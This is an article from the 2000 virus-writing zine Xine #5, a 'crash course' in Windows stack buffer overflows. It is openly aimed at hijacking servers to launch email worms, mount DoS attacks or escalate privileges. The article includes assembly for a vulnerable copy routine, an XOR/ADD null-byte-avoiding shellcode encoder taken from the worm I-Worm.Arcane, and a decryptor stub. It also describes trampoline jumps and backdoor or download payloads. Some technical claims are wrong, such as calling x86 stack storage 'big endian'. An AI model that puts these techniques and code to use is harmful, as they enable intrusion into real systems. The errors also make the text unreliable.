ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Xine - issue #5 - Phile 116 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ A Crash-course in Buffer Overflows ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Asmodeus iKX (c) 2000, xine#5 ÄÄÄÄÄÄÄÄÄÄÄÄ Basics : Introduction ÄÄÄÄÄÄÄÄÄÄÄÄ "Anarchists of the world unite!, Arsonists of the world, ignite!" "In tranquil silence Peter sits meditating in his pitch black cellar room, he's preparing for battle. The battlefield is not to be fought on this side of the realm yet it requires full conciousness and awareness. He's a highly ranked leader following the arcane "blacks arts". Slowly he completes the trancesession and fully embraces his digital form. In this realm he's known as Belzath an notorius virus coder responsible for handful of highly sophisticated and "sucessful" viruses. Unlike the companion by his side he dabbles with the forces of summoning, he never actually do battle himself. He's like the ominous spider watching silently from the safety of the darkness. His companion is a so called dark- master and skilled hacker who unlike Belzath prefers open battle yet conceal- ed. Todays course is on how to enslave the minds of unsuspecting enemies. The hackers voice echoes in Belzath's head as it floats over enormous distances in an instance "To know your enemy is to defeat your enemy", skillfully the dark master forms an esquised web of creative power known as assembler. "The core of creation is channeled through threads of the one power, assembler!", In lucid enlightment Belzath recieves the flow of experince the dark master so friendly offers him, embraces it and slowly fades into the obscure darkness of his study." My lesson to you is how to enslave a processor and control it over any distance. With the knowledge you obtain from reading this article you will be able to transform an email server into a spawning pool for email worms or maybe a virus launchpad, DoS minion the power lies in your hands. But just because you possess the power doesn't mean you should abuse it, it's your own decision and don't blame me if your actions get you in trouble. A buffer overflow can also be exploited on a localmahine to obtain administrator access. On NT workstations you often have a set of USER and ADMINISTRATOR access levels. Some programs need to be installed with ADMINISTRATOR access level and hence executes in that access level. If you can snatch the EIP (exstended instruction pointer) from that program you will also be able to perform actions in the ADMINISTRATOR access level , the NT station is yours... So what is a buffer overflow? Well the word describes the condition pretty good, when a program stores an amount of data it could eighter save it in precompiled static buffers in .DATA section of the program or it could use dynamicaly allocated buffers on the stack (don't confuse this with global and virtual memory that are allocated on RAM). Well so what is the stack? It's memory BUT its a bit diffrent from ordinary memory. First of all it is divided in arrays of DWORDs, that means you can't put a BYTE on stack. Well ofcourse you could put for instance 01h on stack but it would be p- added to 00000001h. What else should you know about the stack? Well first of all it grows from higher memory addresses to lower, sort of from roof to floor. When you put stuff on the stack you usually PUSH them on the stack and when you fetch them back from the stack you POP them. You should also be aware of how the data is stored on stack. Once again the name is a give-away, the data is stored on stack like on "a stack" or pile of paper. What you latest put on the stack you have to remove first to get access to the paper below etc. This is called LIFO which means "Last-in-first -out". Note that everything on the stack follows the big endian format which means it's reversed. Well it's not really reversed, it's just a matter of perspective :> the address 11223344h would look like this on stack 44332211h, see? The KERNEL32.DLL could be seen as the main chapter of a book called "Night of the dead - Windows edition" when your program is started it's called from within an API in windows (maybe CreateProcessA?) and windows allocates a preset amount of stack which is predefined in the PE-header (stack-commit, stack-reserve). ESP holds the stack-pointer which points to the top of stack (remember, it grows from roof to floor) usually HLL use EBP as a frame-pointer but virus coders usally uses it as a delta offset pointer. Anyway when you call an API or any other HLL routine for that matter a certain stack-frame will be built. It is built in a process called "procedure prologue", basicly it saved old EBP redirect EBP to ESP (EBP will be static as ESP is changed) I'll tell you more about the appearance of the stack-frame later. There is no real "universal rule" of how they should look like but most HLL compilers build them in a certain way. Well actually you can't avoid putting the return address on the stack-frame and parameters etc but usually virus coders doesn't use EBP as a frame-pointer. EBP is also known as Exstended BasePointer. Well anyway as our "enemies" aren't virus coders who cares? :> Know your enemy, remember? Ok so the return address and parameters are on the stack what's next? Well the routine hopefully uses some kind of dynamic buffer and "cuts" a hole in stack right below the saved EBP (I'll explain the structure of the stack-frame later). Lets say the buffer holds 3 DWORDs (3*4) = 12 bytes, what happens if you sqeeze 24 bytes into the buffer? A BUFFER OVERFLOW!!! You write past the buffer boundaries and into restricted territory, BUT there are none there to guard the precious data and what is also nice is that you can execute code on the stack it makes no diffrence, cool! :> If you overflow the buffer correctly you can easily redirect the return address and snatch EIP of the process E.G. the execution! "To hold infinity in the palm of your hand and the processor in an hour." ÄÄÄÄÄÄÄÄÄÄÄÄ Goin' deeper : Chapter I ÄÄÄÄÄÄÄÄÄÄÄÄ (Primary objectives : Probing the area) ÄÄÄÄÄÄÄÄÄÄÄÄ Primary objectives : Probing the area ÄÄÄÄÄÄÄÄÄÄÄÄ So what about that stack-frame I was talking about, what does it look like how is it built and what is it good for? Well this is how it is built push 00000003h ; PUSH parameter 3 on stack push 00000002h ; PUSH parameter 2 on stack push 00000001h ; PUSH parameter 1 on stack call function ; Return address is PUSHed on stack (OFFSET 00400300h) ;OFFSET 00400300h ret ; Return to previous frame (KERNEL32.DLL API) function proc local_var:DWORD push ebp ; PUSH old EBP on stack mov ebp,esp ; set EBP (base pointer->frame-pointer) so it points ; to stack-pointers current location. sub esp,12d ; open stack buffer ; Perform some action add esp,12d ; close stack buffer pop ebp ; Restore old EBP from stack (previous frame-pointer) ret ; RETURN to the return address on stack (next paper on ; the pile) function endp This is how it look like ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Stack-frame graphical display ³ ³ þ .......... ....... ³ ³ þ Parameter3 4 bytes ³ OFFSET : 01000020d ³ þ Parameter2 4 bytes ³ OFFSET : 01000016d ³ þ Parameter1 4 bytes ³ OFFSET : 01000012d ³ þ Return Address 4 bytes ³ OFFSET : 01000008d ³ þ Old EBP 4 bytes ³ OFFSET : 01000004d ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ þ Buffer 12 bytes ³ OFFSET : 01000000d : : ú ú ú ú You pushed the parameters on stack, called the routine, the call opcode puts return address on stack and jumps to the address of function() the function() performs a standard HLL "procedure prologue" which consists in putting the current EBP on stack and then redirecting it to the present ESP (stack-pointer) address. Our function() then digs a 12 byte hole in the stack for our buffer and later fills it again, then restores old EBP from stack and performs a RET operation which transfers control to the return address directly on stack (return address sometimes AKA instruction address). Now you know how a stack-frame looks like and how it is built and why. Btw EBP is used as a reference to local variables and parameters. ÄÄÄÄÄÄÄÄÄÄÄÄ Chapter II ÄÄÄÄÄÄÄÄÄÄÄÄ (Primary objectives : Finding buffer overflow) (Secondary objectives : Overrun buffer) ÄÄÄÄÄÄÄÄÄÄÄÄ Primary objectives : Finding buffer overflow ÄÄÄÄÄÄÄÄÄÄÄÄ To simplify things I'll use the buffer overflow condition and stack-frame presented above. As a buffer can hold a specific amount of bytes/characters you'll have to eighter disassemble the function and "manually" check how large the buffer or you could find out by the "brute-force" aproach which means you try by means of trial-and-error how large the buffer is. Notice that a buffer overflow only accures if the buffer is unchecked. Some APIs that are unchecked are lstrcpy, lstrcat and all HLL funcitons that incorperate them or have their own unchecked boundaries such as gets(), sprintf(), and vsprintf(). Here is a modified version of the procedure function() above. The full source of this program is called BOAL.ASM and can be found in Xine#5 [Utilities section] buffer_proc PROC parameter_1:DWORD ;int 3h ;set a break point in the program so you can ;study it in action if you don't want to find buffer overflow by ;means of trial-and-error. push ebp mov ebp,esp mov esi,dword ptr [parameter_1] ; Pointer to memory address with NULL ; terminated string sub esp,12d ; Size of buffer <-- Find this with method mov edi,esp ; no 1. stuff_it_in: cmp byte ptr [esi],0 ; Check for NULL terminator je found_copy_end ; IF found we're at end of string cmp byte ptr [esi],0dh ; check for Line Feed je found_copy_end ; IF found we're at end of string cmp byte ptr [esi],0ah ; check for Carrier Return je found_copy_end ; IF found we're at end of string movsb ; Keep on movin baby :> jmp stuff_it_in ; You know what time it is. found_copy_end: ;int 3h add esp,12d ; fix stack pop ebp ; Get old EBP back ret ; RETURN to saved Instruction pointer buffer_proc endp You call the above routine like this lea eax,string_i_want_to_copy push eax call buffer_proc In C it looks like this ReturnVal = buffer_proc(mem_address); Where mem_address is a 32-bit intiger pointing to a memory address containing your NULL terminated string. You could use the function GetCommandLineA to faster test diffrent string lenghts. You could also code a brute-forcer that constantly feeds the buffer_proc() with diffrent lenght strings and prints the string lenght that causes a access violation fault (requires a SEH guard). Make sure you fill the buffer with values you will recognize in HEX value. For instance if you fill it with "x" characters the EIP should be redirected to the address 78787878h if it's entirely overwritten. Examples of method no. 2 of finding buffer overflows in the BOAL.ASM file boal.exe /x 1 byte character ... boal.exe /xxxxxxxxxxxxxxxx 16 bytes of character boal.exe /xxxxxxxxxxxxxxxxxxxx < EIP = 78787878h> 20 bytes of character ÄÄÄÄÄÄÄÄÄÄÄÄ Secondary objectives : Overrun buffer ÄÄÄÄÄÄÄÄÄÄÄÄ The EBP is first overwritten and then the EIP... Ok that makes sence lets take a look at the stack-frame and how it looks after the overflow ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Stack-frame graphical display ³ ³ þ parameter_1 (87654321h) 4 bytes ³ OFFSET : 01000012d ³ þ Return Address [xxxx] (78787878h) 4 bytes ³ OFFSET : 01000008d ³ þ Old EBP [xxxx] (78787878h) 4 bytes ³ OFFSET : 01000004d ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ þ Buffer [xxxxxxxxxxxx] (78h)*12 12 bytes ³ OFFSET : 01000000d : : ú ú ú ú If the buffer would have been larger we could have fitted some code into it and redirected the return address to the start of the buffer. But with 12 bytes we can't do very much :> so we will have to overwrite the stack beyond the return address with our code. parameter_1 will be overwritten but in that instance the parameter_1 has already been fetched from stack, hopefully the routine won't use it anymore before the RET opcode (operation code). We now encounter the first problem, if the address we're going to redirect EIP to contains a NULL byte we won't be able to have code beyond it as it will serve as a NULL terminator for the string and might even screw up the new return address. So we have hit the wall, what could be done!? To find the solution for this problem we must start up the debuger and have a look at the state of the processor registers at buffer overflow instance. Often ESP points to the start of the buffer and EDI to the end of the buffer. If you find a register that points somewhere inside the buffer we could fill the buffer with NOPs (0x90h) and a jump instruction to the rest of hour code beyond the return address. ESP can often be used as well, but how can a processor register value be used!? Well we'll have to be smart, you're smart right? If so you should have figured out by now how to perform the stack jump. For the less fortunate I'll explain how ;> Btw of course you're smart, you downloaded Xine#5 didn't you? Lets pretend ESP holds the address of the start of the buffer and we have filled the buffer before old EBP and return address with NOPs and a JMP 10 bytes beyond the return address. We now have to find a memory address containing no NULL bytes that will perform a JMP ESP or CALL ESP opcode. If you find a code sequence that does something like this PUSH ESP;RET you can use it as well. If you don't know what OS version or service pack that the software run on it could be difficult to find a DLL that contains those bytes and always loads on same address on all OS versions (NT 4.0/5.0 and Win9x). The best thing would be if the program itself used DLLs that had the wanted opcode sequence at an address without NULL bytes. To find the opcode sequence compile some code that contains the opcode (JMP ESP for instance) then start your debuger and check the hex value. NOP for instance has the hex value 90h, to find a NOP opcode inside a DLL or program you could eighter use your debuger or a hexeditor and search for the opcode. Softice has the command syntax s (as in search) type HELP s for more info. Once you have found the memory address that contains the wanted opcode and no NULL byte you can use it as new return address in your exploit code. TIME OUT! I hope I didn't lose you, lets go through it once more... If the stack address we wanted to redirect the return address to contianed a NULL byte and the buffer was to small to fit all of our code we have to perform a stack jump. That means we have to find a processor register that points to a memory address we can fill with code. Once we found such a register we must find a memory address inside some DLL of the system that performs a JMP or CALL where is the register containing the memory address we wanted to redirect the return address to. Ok so we now have a memory address that points to a JMP opcode and contains no NULL bytes and points to our code... ÄÄÄÄÄÄÄÄÄÄÄÄ Chapter III ÄÄÄÄÄÄÄÄÄÄÄÄ (Primary objectives : Defeating bad opcode situation) (Secondary objectives : Writing the payload) ÄÄÄÄÄÄÄÄÄÄÄÄ Primary objectives : Defeating bad opcode situation ÄÄÄÄÄÄÄÄÄÄÄÄ We have redirected the return address to our code, but our code has to be intact for it to work... so why wouldn't it be intact? Well during the buffer overflow it passes through a routine often an API or other routine. So what? Well as buffer oveflows are common in string handling routines that keeps copying/moving the string bytes until it hits a NULL terminator. Some APIs also stop at CR or LF bytes (0dh, 0ah) If your code contains any NULL bytes which it always does (well almost) you will have to encrypt it. Best method is to combine XOR and ADD/SUB encryption. I coded this encryption engine for I-Worm.Arcane which will find an encryption scheme of XOR and ADD combinations that will produce encryped code with no NULL/CR/LF characters. call generate_decryptor ret generate_decryptor: ;int 3h xor edx,edx mov eax,arcane_total_size add eax,1d push eax push edx call_ arcane_GlobalAllocA ; Allocate arcane_total_size of bytes + 1 bytes of memory for the ; encrypted body. mov dword ptr [ebp+arcane_cryptmem],eax ; save the memory address call find_enc_keys test eax,eax je all_keys_bad ; check if we found an encryption scheme ;int 3h mov byte ptr [ebp+xor_val],al mov byte ptr [ebp+add_val],bl ; We found a scheme, and we save the values all_keys_bad: ; eighter we found the keys or we found none :> ret find_enc_keys: xor eax,eax restart_search: lea esi,[ebp+arcane_project] mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size cld rep movsb ; Copy our code to the allocated memory mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size find_key: inc eax enc_body: xor byte ptr [edi], al inc edi loop enc_body ; XOR encrypt it with the byte value in AL mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size check_if_valid_enc: cmp al,255d jae no_more_byte_key loop_the_enc_body: cmp byte ptr [edi],0 je found_invalid_byte cmp byte ptr [edi],0ah je found_invalid_byte cmp byte ptr [edi],0dh je found_invalid_byte inc edi loop loop_the_enc_body jmp found_enc_key ; Check if code is valid or if it contains unwanted bytes found_invalid_byte: call test_adds test ebx,ebx je restart_search found_enc_key: ret no_more_byte_key: xor eax,eax ret test_adds: xor ebx,ebx find_add: mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size inc ebx add_body: add byte ptr [edi], bl inc edi loop add_body ; ADD encrypt the body (which already has a XOR layer) mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size check_if_valid_add: cmp bl,255d jae no_more_add_byte loop_the_add_body: cmp byte ptr [edi],0 je found_invalid_add cmp byte ptr [edi],0ah je found_invalid_add cmp byte ptr [edi],0dh je found_invalid_add inc edi loop loop_the_add_body jmp found_add_key ; Check if code is valid or if it contains unwanted bytes found_invalid_add: mov edi,dword ptr [ebp+arcane_cryptmem] mov ecx,arcane_total_size sub_body: sub byte ptr [edi], bl inc edi loop sub_body jmp find_add ; Decrypt the body so we can check another ADD value found_add_key: ret no_more_add_byte: xor ebx,ebx ret ;db "decryptor_start",0 decryptor_start: xor eax,eax xor ecx,ecx jmp get_loc got_loc: pop esi mov cx,arcane_total_size xor_it: sub byte ptr [esi],0h add_val equ $-1 xor byte ptr [esi],0h xor_val equ $-1 inc esi loop xor_it jmp encrypted_start get_loc: call got_loc encrypted_start: decryptor_end: ;db "decryptor ends here",0 decryptor_len equ $-offset decryptor_start As the code of the decryptor can't contain any NULL bytes we have to code it smart as well (as it can't be encrypted). To get offsets which contains NULL bytes we must make use of the way CALL puts return address on stack and POP it into a register. Maybe like this jmp get_my_offset got_it: pop edi ; EDI = THIS OFFSET ; rest of our decryptor etc get_my_offset: call got_it ;THIS OFFSET db "encrypted code here",0 We have the encrypted code in memory and have "generated" the decryptor for the encrypted code. So what is next? the payload... we need some code to be executed. Let your imagination flourish. ÄÄÄÄÄÄÄÄÄÄÄÄ Secondary objectives : Writing the payload ÄÄÄÄÄÄÄÄÄÄÄÄ Now you have control and your code can execute, what are you waiting for do your work! Maybe open up a connection to the internet and download some larger component, this is called an EGG procedure. You could also open up a backdoor to the internet, or if you're on a localmachine you could execute some batch file with commands you want to peform in the higher access level. Or perform them yourself. If you're on an NT machine (duh) you could start a command prompt (CMD.EXE) which will run in higher access level as well as all you do in it. I won't explain how to obtain the API address. Eighter you could fetch them from KERNEL32.DLL export directory as you do in win32 viruses. You could also fetch them from the import table of the program you're exploiting, but sometimes they don't have all APIs you need. Then you should look for LoadLibrary and GetProcAddress APIs in the import directory. I leave the rest to you ÄÄÄÄÄÄÄÄÄÄÄÄ Apendix ÄÄÄÄÄÄÄÄÄÄÄÄ NULL byte = NULL Terminator 0x00h CR = Carrier Return 0x0dh LF = Line Feed 0x0ah Opcode = Operation code EIP = Exstended Instruction Pointer WORD = Two bute (2 bytes) DWORD = Double word (4 bytes) RAM = Random Access Memory (temporary storage [one boot-session]) HLL = Highlevel language (like C++, Delphi etc)